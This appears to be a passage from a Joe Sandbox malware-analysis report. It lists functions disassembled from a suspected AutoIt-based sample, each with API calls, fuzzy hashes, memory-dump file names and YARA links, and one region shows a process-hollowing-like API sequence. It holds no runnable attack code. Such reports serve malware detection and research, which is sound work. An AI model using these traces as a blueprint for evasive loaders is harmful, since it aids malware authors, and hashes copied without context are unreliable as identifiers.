Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 41b2e815db99d1585ff45b4e388ee8dec36c3676263e94da346abc1fabece697
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: AE41D775B007459FDB1ADFA9D8A0FAE7BA5EF41360B24813DE825CB680EB71DD408B40

Function 003A4C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A4CBA

Strings

EA06, xrefs: 003DD8CC
AU3!P/C, xrefs: 003A4CB4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/C$EA06
API String ID: 4104443479-3548660842
Opcode ID: 215f077e061c19c91ca8582feb8411d16c5a2817d720830f9281fcc3f8c70ee4
Instruction ID: 0814ba6b8147a7540a1ad42a0e3fdb90aa316b08f3b42bdc672edcb37d407986
Opcode Fuzzy Hash: 215f077e061c19c91ca8582feb8411d16c5a2817d720830f9281fcc3f8c70ee4
Instruction Fuzzy Hash: DB416E32A041586BDF279B64C8527BE7FA6DBC7300F284475FC86DF287D6A49D4483A1

Function 003A7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003DEA39
GetOpenFileNameW.COMDLG32(?), ref: 003DEA83

Part of subcall function 003A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003A4743,?,?,003A37AE,?), ref: 003A4770

Part of subcall function 003C0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003C07B0

Strings

X, xrefs: 003DEA51

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 27d7bc0a2a162e89db5a9ec7a7b95519ba6891eb19013587fd4a3fee3268dbfd
Instruction ID: c35b40a3987670f81d00820da16c1bd5933a802569a0436fd478ed9a30789ddd
Opcode Fuzzy Hash: 27d7bc0a2a162e89db5a9ec7a7b95519ba6891eb19013587fd4a3fee3268dbfd
Instruction Fuzzy Hash: DC21A471A002489BCB129F94DC45BEE7BFCAF49710F00405AE848BB241DFB859898FA5

Function 00408D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00408DAC
__fread_nolock.LIBCMT ref: 00408DC1

Strings

EA06, xrefs: 00408DF3

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 6a4d1247bfe065e288d746f1923dd4963771d16721325278472cbcf725d8f7c2
Instruction ID: a55827cbe00f383af56c015177e4f59db9d621bdbbb2d990244a91d97430a857
Opcode Fuzzy Hash: 6a4d1247bfe065e288d746f1923dd4963771d16721325278472cbcf725d8f7c2
Instruction Fuzzy Hash: 7801F9718042187EDB19CAA8C816FEEBBF8DF11301F00459FF592D61C1E979EA088760

Function 004098E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004098F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0040990F

Strings

aut, xrefs: 00409909

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 953e6b275283ce5803dd81260a181519c9ffa96a14cf587cf8d254dfaf3fdb4d
Instruction ID: 6d8557f1e6a287ea358216af27d0f073defdfa6c39e6613dcde756529148a7f5
Opcode Fuzzy Hash: 953e6b275283ce5803dd81260a181519c9ffa96a14cf587cf8d254dfaf3fdb4d
Instruction Fuzzy Hash: 11D05B7554030DABDB609B90DC0DF96773CD704701F8002F1BE54D1191DD71555D8BA5

Function 0041CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea1252d5d6cd32ea03ba6fe7a10fd4871ddcc4fe9653678f660428959b6aba47
Instruction ID: 7832dd4a2c4ddfaeff2e24b89727590dbb5cc3fdc77baf55a7ec367e2721e356
Opcode Fuzzy Hash: ea1252d5d6cd32ea03ba6fe7a10fd4871ddcc4fe9653678f660428959b6aba47
Instruction Fuzzy Hash: 9EF14A716083009FC714DF29C884A6ABBE5FF89314F54892EF8999B391D734E946CF86

Function 003A434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003A4370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 003A4415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 003A4432

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 6251fa46920e96d3f00e18373f398b9987d29b474bd17c5f71347ca880aedf3e
Instruction ID: 3285c91556f310235ec57d14e6b190c7a8a8e10f94e8e58913ef54d1cf99f084
Opcode Fuzzy Hash: 6251fa46920e96d3f00e18373f398b9987d29b474bd17c5f71347ca880aedf3e
Instruction Fuzzy Hash: F13191B0504701CFD722DF34D88469BBBF8FB99308F00093EE59A86291E7F1A948CB56

Function 003C571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 003C5733

Part of subcall function 003CA16B: __NMSG_WRITE.LIBCMT ref: 003CA192
Part of subcall function 003CA16B: __NMSG_WRITE.LIBCMT ref: 003CA19C

__NMSG_WRITE.LIBCMT ref: 003C573A

Part of subcall function 003CA1C8: GetModuleFileNameW.KERNEL32(00000000,004633BA,00000104,?,00000001,00000000), ref: 003CA25A
Part of subcall function 003CA1C8: ___crtMessageBoxW.LIBCMT ref: 003CA308

Part of subcall function 003C309F: ___crtCorExitProcess.LIBCMT ref: 003C30A5
Part of subcall function 003C309F: ExitProcess.KERNEL32 ref: 003C30AE

Part of subcall function 003C8B28: __getptd_noexit.LIBCMT ref: 003C8B28

RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000000,?,?,?,003C0DD3,?), ref: 003C575F

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 8ef55bccc04b380bcc5648a073a738a020d4bfabc6965d5308f9ef90146d6bea
Instruction ID: ad93905980b302d01348e0236fe8df2e00a445e0e636a0d14dd0aabcec2bbd0b
Opcode Fuzzy Hash: 8ef55bccc04b380bcc5648a073a738a020d4bfabc6965d5308f9ef90146d6bea
Instruction Fuzzy Hash: 48019E36240B51DAD6133B78AC92F2E73989B82762F52053EF405EE181EFB0BDC047A5

Function 004098A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00409548,?,?,?,?,?,00000004), ref: 004098BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00409548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004098D1
CloseHandle.KERNEL32(00000000,?,00409548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004098D8

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 2a44aa758e1465fa35cfde22d429c7c8942288e607a595601eb08fb3e9bf9272
Instruction ID: be34833b3637874656fbb59bb3d413fad55b001b1df2c18392a64600d39babbd
Opcode Fuzzy Hash: 2a44aa758e1465fa35cfde22d429c7c8942288e607a595601eb08fb3e9bf9272
Instruction Fuzzy Hash: 2DE08632241214B7D7312B54EC0AFDA7B29AB06760F948230FB14B91E087B12926979C

Function 00408D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00408D1B

Part of subcall function 003C2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,003C9A24), ref: 003C2D69
Part of subcall function 003C2D55: GetLastError.KERNEL32(00000000,?,003C9A24), ref: 003C2D7B

_free.LIBCMT ref: 00408D2C
_free.LIBCMT ref: 00408D3E

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: f33a83ba278a4491ec052c012339a4f54edd64694575dd5cdf25f52b556b0dd8
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 44E012F16116014BDB25B5B8AA44F9323DC4F683527140A3EB45EEB2C6CE78FC42822C

Function 003AA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 003DFC01

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 99cba50839a9971556dae5d5c9537d69e64c879861bd33f64cc607e2fe4932ab
Instruction ID: d3da91ec9a508ea19bbe53116f09f9e45f6087df9512fac673c793e142c5325b
Opcode Fuzzy Hash: 99cba50839a9971556dae5d5c9537d69e64c879861bd33f64cc607e2fe4932ab
Instruction Fuzzy Hash: 84227971508640DFCB26DF24C490B6AB7E5FF46304F15896EE88A9B762D735EC44CB82

Function 003A7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A7AAB
_memmove.LIBCMT ref: 003A7B16

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
Instruction ID: 910a5cdcf9da20b205fee26a90d5031d477be3592695c24ad69d83aa8cdd7553
Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
Instruction Fuzzy Hash: 703171B2604606AFC705DF68DCD1E69B3A9FF493207158629E51ACB791EB30ED60CB90

Function 003A47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 003A4834

Part of subcall function 003C336C: __lock.LIBCMT ref: 003C3372
Part of subcall function 003C336C: DecodePointer.KERNEL32(00000001,?,003A4849,003F7C74), ref: 003C337E
Part of subcall function 003C336C: EncodePointer.KERNEL32(?,?,003A4849,003F7C74), ref: 003C3389

Part of subcall function 003A48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003A4915
Part of subcall function 003A48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003A492A

Part of subcall function 003A3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A3B68
Part of subcall function 003A3B3A: IsDebuggerPresent.KERNEL32 ref: 003A3B7A
Part of subcall function 003A3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004652F8,004652E0,?,?), ref: 003A3BEB
Part of subcall function 003A3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 003A3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003A4874

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 8edd36c9d87d8e5c369c15c1134dcb28f14eb3cb3e54276cb4ab49a2b6843720
Instruction ID: a6efe730657382ea1b59a5c9b06fa672b428938b51e9d94a81f61a823f3c295d
Opcode Fuzzy Hash: 8edd36c9d87d8e5c369c15c1134dcb28f14eb3cb3e54276cb4ab49a2b6843720
Instruction Fuzzy Hash: 5D11AF719083419FC701EF28E80590ABFE8FF85750F10452EF040972B1EBB59949CF9A

Function 003C0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003C571C: __FF_MSGBANNER.LIBCMT ref: 003C5733
Part of subcall function 003C571C: __NMSG_WRITE.LIBCMT ref: 003C573A
Part of subcall function 003C571C: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000000,?,?,?,003C0DD3,?), ref: 003C575F

std::exception::exception.LIBCMT ref: 003C0DEC
__CxxThrowException@8.LIBCMT ref: 003C0E01

Part of subcall function 003C859B: RaiseException.KERNEL32(?,?,?,00459E78,00000000,?,?,?,?,003C0E06,?,00459E78,?,00000001), ref: 003C85F0

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 118cb77e6228e00a2bf77cffe34536470b5038ca5dce55f378d3a70b5f05ba09
Instruction ID: 8609e7b6c0fcaba87ca27f3a45afb23d3511153a9c5ae9ec7bdde3e16e5d4531
Opcode Fuzzy Hash: 118cb77e6228e00a2bf77cffe34536470b5038ca5dce55f378d3a70b5f05ba09
Instruction Fuzzy Hash: 7AF0813150035AA6CB1AABA4ED05FDE77AC9F05311F10442EF908EA581DFB1AE8187D5

Function 003C55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C562C
__lock_file.LIBCMT ref: 003C564D

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: b1345b58d789887803650c222662c993f5bae3cc3f089e06d9239adf262d6f7c
Instruction ID: 9eedafb631bab4bbec8dfa79783b156cdf3caa44dccb3b4b9b689290ad1a23ca
Opcode Fuzzy Hash: b1345b58d789887803650c222662c993f5bae3cc3f089e06d9239adf262d6f7c
Instruction Fuzzy Hash: DA01D472800608ABCF13AF698C06E9E7B61AF90322F51411DF824DE191DB319EA1DF91

Function 003C53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 003C8B28: __getptd_noexit.LIBCMT ref: 003C8B28

__lock_file.LIBCMT ref: 003C53EB

Part of subcall function 003C6C11: __lock.LIBCMT ref: 003C6C34

__fclose_nolock.LIBCMT ref: 003C53F6

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 1cc81123d4475c88595b5e9512e9761767283dd676d4e0155085d1f62c34ae90
Instruction ID: 90997e604f7311cf10bfd5f3ddd9d0c6ad78987863c3dd3024f8d82e0d7f42f5
Opcode Fuzzy Hash: 1cc81123d4475c88595b5e9512e9761767283dd676d4e0155085d1f62c34ae90
Instruction Fuzzy Hash: B4F09031910A449ADB13AF659806FAE6AA06F41375F25820DE424EF1C1CFFCAE819B52

Function 0100E11D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0100E94D
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0100E971
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0100E993

Memory Dump Source

Source File: 00000000.00000002.2056055672.000000000100C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0100C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_100c000_n0nsAzvYNd.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction ID: 31f85e44ca04ffb7af88313133a435f14298611f19890cafde447d5166e5bd99
Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
Instruction Fuzzy Hash: 9B12EF24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A4E77A4F81CF5A

Function 003C0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 003C0CB7

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 22702ee34b9d166c6c36d73e32fb6e0e7b682d12270dfb55cc9c522bfe179941
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B331A070A00145DBC71ADF58C484A69F7A6FB59300B65C7A9E80ACF755DA31EDC1DB80

Function 003DFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 003DFCB7

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

